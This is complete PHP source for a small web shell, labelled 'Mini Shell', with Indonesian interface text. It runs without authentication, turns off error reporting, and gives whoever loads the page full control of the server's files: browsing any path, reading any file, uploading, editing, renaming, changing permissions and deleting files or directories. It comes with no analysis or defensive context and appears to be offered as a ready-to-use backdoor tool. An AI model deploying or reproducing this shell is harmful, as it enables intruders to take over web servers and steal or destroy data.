webshell mini

1. set_time_limit(0);
2. error_reporting(0);
3.  
4. if(get_magic_quotes_gpc()){
5. foreach($_POST as $key=>$value){
6. $_POST[$key] = stripslashes($value);
7. }
8. }
9. echo '<!DOCTYPE HTML>
10. <HTML>
11. <HEAD>
12. <link href="" rel="stylesheet" type="text/css">
13. <title> lol </title>
14. <style>
15. body{
16. font-family: "Racing Sans One", cursive;
17. background-color: #e6e6e6;
18. text-shadow:0px 0px 1px #757575;
19. }
20. #content tr:hover{
21. background-color: #636263;
22. text-shadow:0px 0px 10px #fff;
23. }
24. #content .first{
25. background-color: silver;
26. }
27. #content .first:hover{
28. background-color: silver;
29. text-shadow:0px 0px 1px #757575;
30. }
31. table{
32. border: 1px #000000 dotted;
33. }
34. H1{
35. font-family: "Rye", cursive;
36. }
37. a{
38. color: #000;
39. text-decoration: none;
40. }
41. a:hover{
42. color: #fff;
43. text-shadow:0px 0px 10px #ffffff;
44. }
45. input,select,textarea{
46. border: 1px #000000 solid;
47. -moz-border-radius: 5px;
48. -webkit-border-radius:5px;
49. border-radius:5px;
50. }
51. </style>
52. </HEAD>
53. <BODY>
54. <H1><center><img src="https://s.yimg.com/lq/i/mesg/emoticons7/19.gif"/>
55. [ Mini Shell ] <img src="https://s.yimg.com/lq/i/mesg/emoticons7/19.gif"/>
56. </center></H1>
57. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
58. <tr><td>Direktori : ';
59. if(isset($_GET['path'])){
60. $path = $_GET['path'];
61. }else{
62. $path = getcwd();
63. }
64. $path = str_replace('\\','/',$path);
65. $paths = explode('/',$path);
66.  
67. foreach($paths as $id=>$pat){
68. if($pat == '' && $id == 0){
69. $a = true;
70. echo '<a href="?path=/">/</a>';
71. continue;
72. }
73. if($pat == '') continue;
74. echo '<a href="?path=';
75. for($i=0;$i<=$id;$i++){
76. echo "$paths[$i]";
77. if($i != $id) echo "/";
78. }
79. echo '">'.$pat.'</a>/';
80. }
81. echo '</td></tr><tr><td>';
82. if(isset($_FILES['file'])){
83. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
84. echo '<font color="green">File Ter-Upload :* </font><br />';
85. }else{
86. echo '<font color="red">Upload gagal, Servernya kek <img src="https://s.yimg.com/lq/i/mesg/emoticons7/19.gif"/>
87. </font><br />';
88. }
89. }
90. echo '<form enctype="multipart/form-data" method="POST">
91. Upload File : <input type="file" name="file" />
92. <input type="submit" value="upload" />
93. </form>
94. </td></tr>';
95. if(isset($_GET['filesrc'])){
96. echo "<tr><td>Current File : ";
97. echo $_GET['filesrc'];
98. echo '</tr></td></table><br />';
99. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
100. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
101. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
102. if($_POST['opt'] == 'chmod'){
103. if(isset($_POST['perm'])){
104. if(chmod($_POST['path'],$_POST['perm'])){
105. echo '<font color="green">Change Permission Done.</font><br />';
106. }else{
107. echo '<font color="red">Change Permission Error.</font><br />';
108. }
109. }
110. echo '<form method="POST">
111. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
112. <input type="hidden" name="path" value="'.$_POST['path'].'">
113. <input type="hidden" name="opt" value="chmod">
114. <input type="submit" value="Go" />
115. </form>';
116. }elseif($_POST['opt'] == 'rename'){
117. if(isset($_POST['newname'])){
118. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
119. echo '<font color="green">Change Name Done.</font><br />';
120. }else{
121. echo '<font color="red">Change Name Error.</font><br />';
122. }
123. $_POST['name'] = $_POST['newname'];
124. }
125. echo '<form method="POST">
126. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
127. <input type="hidden" name="path" value="'.$_POST['path'].'">
128. <input type="hidden" name="opt" value="rename">
129. <input type="submit" value="Go" />
130. </form>';
131. }elseif($_POST['opt'] == 'edit'){
132. if(isset($_POST['src'])){
133. $fp = fopen($_POST['path'],'w');
134. if(fwrite($fp,$_POST['src'])){
135. echo '<font color="green">Edit File Done ~_^.</font><br />';
136. }else{
137. echo '<font color="red">Edit File Error ~_~.</font><br />';
138. }
139. fclose($fp);
140. }
141. echo '<form method="POST">
142. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
143. <input type="hidden" name="path" value="'.$_POST['path'].'">
144. <input type="hidden" name="opt" value="edit">
145. <input type="submit" value="Go" />
146. </form>';
147. }
148. echo '</center>';
149. }else{
150. echo '</table><br /><center>';
151. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
152. if($_POST['type'] == 'dir'){
153. if(rmdir($_POST['path'])){
154. echo '<font color="green">Delete Dir Done.</font><br />';
155. }else{
156. echo '<font color="red">Delete Dir Error.</font><br />';
157. }
158. }elseif($_POST['type'] == 'file'){
159. if(unlink($_POST['path'])){
160. echo '<font color="green">Delete File Done.</font><br />';
161. }else{
162. echo '<font color="red">Delete File Error.</font><br />';
163. }
164. }
165. }
166. echo '</center>';
167. $scandir = scandir($path);
168. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
169. <tr class="first">
170. <td><center>Name</center></td>
171. <td><center>Size</center></td>
172. <td><center>Permissions</center></td>
173. <td><center>Options</center></td>
174. </tr>';
175.  
176. foreach($scandir as $dir){
177. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
178. echo "<tr>
179. <td><a href=\"?path=$path/$dir\">$dir</a></td>
180. <td><center>--</center></td>
181. <td><center>";
182. if(is_writable("$path/$dir")) echo '<font color="green">';
183. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
184. echo perms("$path/$dir");
185. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
186.  
187. echo "</center></td>
188. <td><center><form method=\"POST\" action=\"?option&path=$path\">
189. <select name=\"opt\">
190. <option value=\"\"></option>
191. <option value=\"delete\">Delete</option>
192. <option value=\"chmod\">Chmod</option>
193. <option value=\"rename\">Rename</option>
194. </select>
195. <input type=\"hidden\" name=\"type\" value=\"dir\">
196. <input type=\"hidden\" name=\"name\" value=\"$dir\">
197. <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
198. <input type=\"submit\" value=\">\" />
199. </form></center></td>
200. </tr>";
201. }
202. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
203. foreach($scandir as $file){
204. if(!is_file("$path/$file")) continue;
205. $size = filesize("$path/$file")/1024;
206. $size = round($size,3);
207. if($size >= 1024){
208. $size = round($size/1024,2).' MB';
209. }else{
210. $size = $size.' KB';
211. }
212.  
213. echo "<tr>
214. <td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
215. <td><center>".$size."</center></td>
216. <td><center>";
217. if(is_writable("$path/$file")) echo '<font color="green">';
218. elseif(!is_readable("$path/$file")) echo '<font color="red">';
219. echo perms("$path/$file");
220. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
221. echo "</center></td>
222. <td><center><form method=\"POST\" action=\"?option&path=$path\">
223. <select name=\"opt\">
224. <option value=\"\"></option>
225. <option value=\"delete\">Delete</option>
226. <option value=\"chmod\">Chmod</option>
227. <option value=\"rename\">Rename</option>
228. <option value=\"edit\">Edit</option>
229. </select>
230. <input type=\"hidden\" name=\"type\" value=\"file\">
231. <input type=\"hidden\" name=\"name\" value=\"$file\">
232. <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
233. <input type=\"submit\" value=\">\" />
234. </form></center></td>
235. </tr>";
236. }
237. echo '</table>
238. </div>';
239. }
240. echo '</BODY></HTML>';
241. function perms($file){
242. $perms = fileperms($file);
243.  
244. if (($perms & 0xC000) == 0xC000) {
245. // Socket
246. $info = 's';
247. } elseif (($perms & 0xA000) == 0xA000) {
248. // Symbolic Link
249. $info = 'l';
250. } elseif (($perms & 0x8000) == 0x8000) {
251. // Regular
252. $info = '-';
253. } elseif (($perms & 0x6000) == 0x6000) {
254. // Block special
255. $info = 'b';
256. } elseif (($perms & 0x4000) == 0x4000) {
257. // Directory
258. $info = 'd';
259. } elseif (($perms & 0x2000) == 0x2000) {
260. // Character special
261. $info = 'c';
262. } elseif (($perms & 0x1000) == 0x1000) {
263. // FIFO pipe
264. $info = 'p';
265. } else {
266. // Unknown
267. $info = 'u';
268. }
269.  
270. // Owner
271. $info .= (($perms & 0x0100) ? 'r' : '-');
272. $info .= (($perms & 0x0080) ? 'w' : '-');
273. $info .= (($perms & 0x0040) ?
274. (($perms & 0x0800) ? 's' : 'x' ) :
275. (($perms & 0x0800) ? 'S' : '-'));
276.  
277. // Group
278. $info .= (($perms & 0x0020) ? 'r' : '-');
279. $info .= (($perms & 0x0010) ? 'w' : '-');
280. $info .= (($perms & 0x0008) ?
281. (($perms & 0x0400) ? 's' : 'x' ) :
282. (($perms & 0x0400) ? 'S' : '-'));
283.  
284. // World
285. $info .= (($perms & 0x0004) ? 'r' : '-');
286. $info .= (($perms & 0x0002) ? 'w' : '-');
287. $info .= (($perms & 0x0001) ?
288. (($perms & 0x0200) ? 't' : 'x' ) :
289. (($perms & 0x0200) ? 'T' : '-'));
290.  
291. return $info;
292. }
293.